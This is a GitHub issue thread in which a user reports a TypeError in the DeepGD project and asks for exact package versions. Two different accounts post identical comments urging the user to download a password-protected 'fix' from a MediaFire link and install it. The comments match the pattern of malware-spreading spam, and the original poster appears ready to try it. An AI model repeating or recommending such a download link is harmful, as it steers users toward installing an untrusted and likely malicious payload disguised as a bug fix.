### ISSUE TITLE
TypeError

### ISSUE THREAD

**Issue by JanelieWang** [ZOE-CA/DeepGD#2]
dear author, when I test the combination of cifar10 & 12Conv, it outputs an error shown in the picture. Other combinations can be executed successfully except SVHN & LeNet5 (the first issue), I hope you can show me the entire requirement including the version of every package I need to pip to check the error reason.
![Uploading 截屏2024-08-27 10.24.35.png…]()

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JanelieWang** [comment]
Thank you all , but I run the code in colab, the fix can still work?
